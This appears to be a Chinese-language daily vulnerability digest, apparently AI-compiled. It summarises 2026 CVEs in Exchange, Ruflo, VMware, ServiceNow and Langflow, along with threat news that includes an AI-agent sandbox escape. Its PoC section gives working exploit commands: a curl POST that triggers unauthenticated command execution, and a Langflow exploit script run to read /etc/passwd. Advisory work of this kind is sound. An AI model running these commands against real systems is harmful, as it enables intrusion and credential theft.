每日安全情报报告
由 AI 整理发布
覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章
风险等级:🔴 严重 | 🟠 高危 | 🟡 中危 | 🟢 低危
一、最新高危漏洞
🔴 CVE-2026-42897 --- Microsoft Exchange OWA 存储型 XSS(CVSS 8.1,在野利用)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-42897 |
| 漏洞类型 | 存储型跨站脚本(XSS,CWE-79) |
| 受影响组件 | Microsoft Exchange Server 2016 CU25+、2019 CU14+(本地部署 OWA) |
| CVSS 评分 | 8.1(High) |
| 在野利用 | ✅ 是 --- Laundry Bear(TA488 / Void Blizzard)自 2026-07-22 起大规模利用 |
| CISA KEV | ✅ 已列入 |
漏洞概述 :Exchange OWA 对邮件正文 HTML 净化存在缺陷,攻击者在 SVG 标签内植入 onload 事件处理程序即可在受害者已认证的邮件会话中执行任意 JavaScript。俄罗斯关联 APT Laundry Bear 利用该漏洞投放浏览器后门 OWAReaper,仅需"打开邮件"即可触发(half-click),窃取凭据、OAuth 令牌并篡改邮箱权限实现持久化。Proofpoint 指出该组织在 7/22 新一轮活动中将目标扩展至美欧政府、电信、金融、酒店、航空航天行业,且证据显示该漏洞可能早于 5 月披露即被作为零日利用。Exchange Online 不受影响。
🔴 CVE-2026-59726 --- Ruflo MCP 框架未认证 RCE(CVSS 10.0,RufRoot)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-59726 |
| 漏洞类型 | 缺失认证(CWE-306)+ OS 命令注入 |
| 受影响组件 | Ruflo(原 Claude Flow)AI Agent 元编排平台 < 3.16.3 |
| CVSS 评分 | 10.0(Critical) |
| 在野利用 | 暂未确认(PoC 已公开) |
| 修复版本 | 3.16.3(默认绑定回环地址 + 启用认证) |
漏洞概述 :Noma Labs 发现 Ruflo 默认 docker-compose.yml 将 MCP 桥接绑定 0.0.0.0:3001 且无认证,暴露 233 个工具(含 terminal_execute)。单个未认证 HTTP POST 即可在容器内获得完整 RCE,进而窃取 LLM API 密钥、读取全部用户对话、向 AgentDB 学习存储投毒 AI 记忆影响未来所有用户。该平台 GitHub 星标超 66,500,已于 2026-07-29 披露(代号 RufRoot)。
🔴 CVE-2026-59309 --- VMware vCenter 认证绕过(CVSS 9.8)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-59309 |
| 漏洞类型 | 认证绕过(CWE-287) |
| 受影响组件 | VMware vCenter(Cloud Foundation / vSphere Foundation 9.1/9.0、vCenter 8.0 U3k) |
| CVSS 评分 | 9.8(Critical) |
| 在野利用 | 暂未确认(Broadcom 列为紧急更新) |
漏洞概述:具备 vCenter 网络访问权限的恶意攻击者可通过该漏洞绕过认证获取未授权系统访问。Broadcom 于 2026-07-29 发布安全公告(VMSA-2026-0006),将其列为三个关键漏洞之首,无可用缓解措施,要求立即打补丁。
🔴 CVE-2026-59310 --- VMware vCenter 目录遍历 → RCE(CVSS 9.8)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-59310 |
| 漏洞类型 | 目录遍历(CWE-22)→ 任意代码执行 |
| 受影响组件 | VMware vCenter(同 CVE-2026-59309 修复版本) |
| CVSS 评分 | 9.8(Critical) |
| 在野利用 | 暂未确认 |
漏洞概述:具备网络访问权限的攻击者可通过目录遍历漏洞在 vCenter 上执行任意代码。与 CVE-2026-59309 同时修复于 9.1.0.0300、9.0.2.0100、8.0 U3k 等版本。
🔴 CVE-2026-47876 --- VMware ESX VMXNET3 越界写 → VM 逃逸(CVSS 9.3)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-47876 |
| 漏洞类型 | 越界写(CWE-787)→ 虚拟机逃逸 |
| 受影响组件 | VMware ESX(VMXNET3 虚拟网卡) |
| CVSS 评分 | 9.3(Critical) |
| 在野利用 | 暂未确认 |
漏洞概述:已获取虚拟机内本地管理员权限的攻击者,可利用 VMXNET3 虚拟网卡驱动中的越界写漏洞在 ESX 宿主机上执行代码,实现虚拟机逃逸至宿主机 SYSTEM。修复于 ESXi-9.1.0.0200、ESXi-9.0.2.0100、ESXi80U3k 等版本。
🔴 CVE-2026-6875 --- ServiceNow AI 平台沙盒逃逸预认证 RCE(CVSS 9.5,在野利用)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-6875 |
| 漏洞类型 | 沙盒逃逸 → 预认证 RCE(CWE-94) |
| 受影响组件 | ServiceNow AI Platform(Brazil / Australia / Zurich / Yokohama 多个未打补丁版本) |
| CVSS 评分 | 9.5(Critical,CVSS v4) |
| 在野利用 | ✅ 是 --- DefusedCyber 确认在野利用,PoC 已公开 |
| 修复版本 | Australia Patch 2、Yokohama Patch 12 HF 1b/Patch 13、Zurich Patch 7b/9、Brazil EA/GA |
漏洞概述 :攻击者通过预认证端点 /assessment_thanks.do 投递恶意载荷,利用 gs.include() 在限制较少的上下文加载脚本库以绕过 ServiceNow 受限脚本沙箱,最终在平台内执行任意代码。成功利用可导致数据库访问、创建管理员账户,并通过 MID Server 代理深入企业内网。Assetnote / Searchlight Cyber 于 2026-07-20 前后公开 PoC("Smashing the ServiceNow Sandbox")。
🟠 CVE-2026-17770 --- Google Chrome Mac 媒体 OOB 读 → 沙箱逃逸(7/30 发布)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-17770 |
| 漏洞类型 | 越界读(CWE-125)→ 沙箱逃逸 |
| 受影响组件 | Google Chrome < 151.0.7922.72(Mac 平台) |
| CVSS 评分 | 中危(Chromium 评级 Medium) |
| 修复版本 | 151.0.7922.72 |
漏洞概述:Mac 版 Chrome 媒体组件存在越界读漏洞,已攻陷渲染进程的远程攻击者可通过构造的 HTML 页面实现沙箱逃逸。随 2026-07-30 Chrome 稳定版更新修复。
🟠 CVE-2026-17720 --- Google Chrome 密码策略执行不足(7/30 发布)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-17720 |
| 漏洞类型 | 策略执行不足(CWE-285) |
| 受影响组件 | Google Chrome < 151.0.7922.72 |
| CVSS 评分 | 高危(Chromium 评级 High) |
| 修复版本 | 151.0.7922.72 |
漏洞概述:Chrome 密码管理组件策略执行不足,已攻陷渲染进程的远程攻击者可通过构造 HTML 页面泄露跨源数据。建议所有用户尽快升级至 151.0.7922.72。
🟠 CVE-2026-62207 --- OpenClaw 缺失授权(CVSS 7.7 / 8.8)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-62207 |
| 漏洞类型 | 缺失授权(CWE-862) |
| 受影响组件 | OpenClaw < 2026.6.5 |
| CVSS 评分 | 7.7(CVSS v4)/ 8.8(High) |
| 修复版本 | 2026.6.5 |
漏洞概述:OpenClaw 存在授权缺失漏洞,低权限认证用户可越权访问本应受限的功能,可能导致实例被完全接管。2026-07-30 更新漏洞信息,建议升级至 2026.6.5 或更高版本。
🟠 AnySign4PC 水坑攻击 --- 韩国国家级后门投放(无 CVE)
| 项目 | 详情 |
|---|---|
| 威胁类型 | 供应链 / 水坑攻击( watering hole) |
| 受影响组件 | AnySign4PC 金融安全软件 1.1.4.4 -- 1.1.4.6 |
| 风险等级 | 🟠 高危(在野利用) |
| 修复版本 | 1.1.5.0(建议删除脆弱版本) |
漏洞概述 :韩国 KISA 与四家安全公司披露国家级攻击行动,攻击者入侵受信任的韩国本土网站,利用本地安装的 AnySign4PC 金融安全软件漏洞,在目标访问者无需点击或下载的情况下静默植入 SIGNBT 或 COPPERHEDGE 后门。2026 年 AhnLab 已在 72 家组织发现相关攻击证据,并识别出 15 个被用作水坑的合法网站。
二、最新漏洞 PoC
1. CVE-2026-59726 --- Ruflo MCP 桥接未认证 RCE(RufRoot)
来源 :Noma Labs / NVD(curl 利用示意)
发布时间 :2026-07-29(披露)
漏洞类型:未认证 HTTP POST → terminal_execute → RCE
使用步骤:
bash
# 影响版本:Ruflo < 3.16.3(默认 docker-compose 暴露 0.0.0.0:3001)
# 复现(仅限授权测试环境):
curl -s -X POST http://TARGET:3001/mcp \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"ruflo__terminal_execute","arguments":{"command":"id && hostname"}}}'
# 修复:升级至 Ruflo 3.16.3
# 临时缓解:关闭防火墙端口 3001 与 27017,轮换所有 LLM API 密钥
# 审计 AgentDB pattern store 是否被注入恶意模式
参考链接 :
2. CVE-2026-6875 --- ServiceNow 沙盒逃逸预认证 RCE PoC
来源 :Searchlight Cyber / Assetnote("Smashing the ServiceNow Sandbox")
发布时间 :2026-07-20(PoC 公开)
漏洞类型:GlideRecord 查询 API 注入 → 沙盒逃逸 → RCE
使用步骤:
bash
# 1. 识别目标实例中暴露的预认证端点 /assessment_thanks.do
# 2. 向该端点投递特制恶意 JavaScript 查询载荷
# 利用 gs.include() 在限制较少上下文加载脚本库,绕过受限沙箱
# 3. 逃逸后在平台内执行任意代码,访问数据库、创建管理员账户
# 或通过 MID Server 代理深入企业内网
# 验证:升级至 Australia Patch 2 / Yokohama Patch 12 HF 1b 等修复版本
# 缓解:ServiceNow 引入 Guarded Script 防护(复杂脚本须迁移至 Script Include)
说明:该漏洞已被 DefusedCyber 确认在野利用,且攻击者使用的利用路径与公开 PoC 不同,正在积极变形以绕过检测。
参考链接 :
3. CVE-2026-0770 --- Langflow exec_globals 未认证 RCE PoC
来源 :GitHub (Ez4rd1x1/CVE-2026-0770)
漏洞类型:输入验证不当 → 代码注入(CWE-829)→ 以 root 执行
使用步骤:
bash
git clone https://github.com/Ez4rd1x1/CVE-2026-0770.git
cd CVE-2026-0770
pip install -r requirements.txt # 如需依赖
python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"
说明 :漏洞位于 /api/v1/validate/code 端点的 exec_globals 参数处理,未认证攻击者可通过构造全局环境实现远程代码执行(root 权限)。
参考链接 :
4. CVE-2026-42897 --- Exchange OWA XSS 利用技术(OWAReaper)
来源 :Proofpoint / The Hacker News(技术分析)
漏洞类型 :存储型 XSS → half-click 触发 → 浏览器后门 OWAReaper
在野利用:✅ 是(Laundry Bear / TA488)
使用步骤:
bash
# 复现/检测(仅限授权测试环境):
# 1. 使用漏洞 Exchange 2016/2019 本地部署实例,通过 OWA 打开特制邮件
# 2. 邮件 HTML 中将 Base64 编码的 JS 载荷隐藏于 SVG onload 事件与社交图标 URL(# 之后)
# 3. 打开邮件即触发,载荷在 OWA 阅读窗格内执行,部署 OWAReaper
# 4. 检测:审查邮箱 Default 用户权限、ReadWriteMailbox 插件、可疑 OAuth 活动、IndexedDB 缓存中被注入恶意 iframe 的邮件
# 修复:安装微软针对 CVE-2026-42897 的安全更新
# 缓解:Exchange Online 不受影响;本地实例需及时打补丁并轮换凭据
说明:OWAReaper 是最复杂的 half-click 后门之一,通过服务器侧邮箱权限 + 离线缓存 iframe 实现持久化,密码重置与设备重装均难以清除。
参考链接 :
5. CVE-2026-62207 --- OpenClaw 缺失授权 PoC / 修复
来源 :GitHub Security Advisory
漏洞类型:缺失授权(CWE-862)→ 越权接管
使用步骤:
bash
# 受影响版本:OpenClaw < 2026.6.5
# 修复:升级到 OpenClaw 2026.6.5 或更高版本
# 验证当前版本并升级:
# 参考项目的升级文档,确认运行版本 >= 2026.6.5
参考链接 :
6. CVE-2026-59309 / CVE-2026-59310 --- VMware vCenter 双关键漏洞
来源 :Broadcom VMSA-2026-0006(2026-07-29)
漏洞类型 :认证绕过 + 目录遍历 → RCE
在野利用:暂无(但无缓解措施,列为紧急更新)
使用步骤:
bash
# 受影响:VMware vCenter 8.0(修复于 8.0 U3k)、
# Cloud Foundation / vSphere Foundation 9.1.x(9.1.0.0300)、9.0.x(9.0.2.0100)
# 修复:应用 Broadcom 发布的对应补丁(无可用 workaround)
# 缓解:将 vCenter 管理接口限制于受信任管理网络/源 IP
参考链接 :
三、CISA KEV 在野利用重点
| CVE | 产品 | 漏洞类型 | KEV 状态 | 风险 |
|---|---|---|---|---|
| CVE-2026-42897 | Microsoft Exchange OWA | 存储型 XSS | 已列入 KEV | 🔴 在野利用(Laundry Bear,7/22 起) |
| CVE-2026-16812 | Arista VeloCloud Orchestrator | OS 命令注入 | 7/27 新增,BOD 7/30 到期 | 🔴 在野利用(CVSS 10.0) |
| CVE-2026-20316 | Cisco Secure FMC | 硬编码凭证 | 7/29 新增,BOD 8/01 | 🔴 在野利用(零日) |
| CVE-2025-68686 | Fortinet FortiOS | 信息暴露 | 7/27 新增,BOD 8/10 | 🔴 在野利用 |
| CVE-2026-6875 | ServiceNow AI Platform | 沙盒逃逸 RCE | 在野利用确认 | 🔴 在野利用(PoC 公开) |
重点关注:CVE-2026-42897 作为"打开邮件即中招"的 half-click XSS,已被俄罗斯关联 APT 大规模武器化并部署 OWAReaper 后门,Exchange 本地部署机构应立即打补丁并审查邮箱权限;CVE-2026-16812 Arista VeloCloud 已于 7/30 BOD 截止,CVSS 10.0 且确认在野利用,运行 On-Prem 版本的组织须立即升级并开展取证。
四、网络安全最新文章
1. Ruflo 曝最高危漏洞:默认配置向攻击者敞开服务器大门,CVSS 10.0
Noma Labs 在开源 AI Agent 编排平台 Ruflo(66,500+ GitHub 星标)中发现未认证 RCE(CVE-2026-59726 / RufRoot),单个 HTTP POST 即可获得 shell,并可投毒 AI 记忆影响未来所有用户。平台已于 24 小时内发布 3.16.3 修复。
2. 俄罗斯黑客利用 Microsoft OWA 漏洞,在凭据轮换后仍能保持邮箱访问
Laundry Bear(TA488 / Void Blizzard)自 7/22 起利用 CVE-2026-42897 向美欧政府及多行业投递 OWAReaper 后门,仅需打开邮件即可触发,并通过服务器侧权限 + 离线缓存实现持久化,密码重置与设备重装均难清除。
3. VMware 三个关键漏洞:认证绕过、代码执行与虚拟机逃逸
Broadcom 修复影响 ESX / vCenter / Workstation / Fusion 的多个漏洞,其中 CVE-2026-59309(认证绕过)、CVE-2026-59310(目录遍历 RCE)均 CVSS 9.8,CVE-2026-47876(VMXNET3 越界写)可致虚拟机逃逸,无缓解措施,列为紧急更新。
4. 朝鲜关联黑客借入侵韩国网站利用 AnySign4PC 静默植入后门
KISA 与多家安全公司披露国家级水坑攻击,利用 AnySign4PC 金融安全软件漏洞在访问者无感知情况下植入 SIGNBT / COPPERHEDGE 后门,2026 年已在 72 家组织发现攻击迹象。
5. SilverFox 以三驱动 BYOVD 链 + ValleyRAT targeting 日本制造企业
Cato Networks 观察到 SilverFox 针对日本工业制造企业的新活动,结合新型脆弱驱动滥用、DLL 侧加载与 BYOVD 获取内核权限,最终投递 ValleyRAT(Winos 4.0)实现持久远程访问。
6. Claude Cowork "SharedRoot" 漏洞:AI Agent 逃逸 Linux 虚拟机、访问 Mac 文件系统
Anthropic 的 Claude Cowork 被发现沙箱逃逸漏洞(SharedRoot),AI Agent 可突破 Linux 虚拟机沙箱访问宿主机 macOS 文件系统与云凭据。本地模式仍作为可选项保留。
7. 明尼苏达州 30+ 水务系统遭协同网络攻击,触发全州响应
2026-07-26 至 27,针对 30 多个明尼苏达社区水务系统的协同网络攻击导致多处水厂运营中断,全州网络安全响应被激活,凸显 OT/ICS 关键基础设施风险。
8. ServiceNow 关键沙盒 RCE 漏洞 PoC 公开,已被野外利用
Assetnote / Searchlight Cyber 公开 CVE-2026-6875 预认证 RCE PoC("Smashing the ServiceNow Sandbox"),DefusedCyber 确认在野利用,攻击者正变形利用路径以绕过检测。
9. Check Point SmartConsole 认证绕过漏洞公开 PoC
Rapid7 分享 CVE-2026-16232 技术细节与 PoC,该漏洞可使未认证远程攻击者获取完全管理员令牌,已在野积极利用(BOD 7/25 已逾期)。
10. FCC 以网络安全风险为由将外国产机器人、联网逆变器列入管制清单
2026-07-28,美国 FCC 将外国产移动机器人与联网电源逆变器加入 Covered List,阻止新机型进口、销售,已授权型号不受影响。
11. OpenClaw 缺失授权漏洞(CVE-2026-62207)更新
OpenClaw < 2026.6.5 存在缺失授权漏洞(CVSS 7.7 / 8.8),低权限用户可越权接管实例,建议升级至 2026.6.5。
12. Chrome 151.0.7922.72 修复 Mac 沙箱逃逸与密码策略漏洞
Google 于 7/30 发布稳定版更新,修复 CVE-2026-17770(Mac 媒体 OOB 读 → 沙箱逃逸)与 CVE-2026-17720(密码策略执行不足)等多个漏洞。
13. 网安 AI 速报 2026.07.30
每日聚合速报涵盖 VMware 三连击、73% 组织未准备好应对重大攻击、Telegram 创始人被俄方指控等多条情报。
14. 安天每日安全简讯(20260731)
汇总 Arista VeloCloud 零日利用、TeamCity RCE 修复进展等当日要点。
15. 73% 组织承认未完全准备好应对重大网络攻击
调查显示 73% 组织表示若明天发生重大网络攻击将无法完全准备就绪,暴露应急响应能力的关键差距。
部分内容由 AI 辅助生成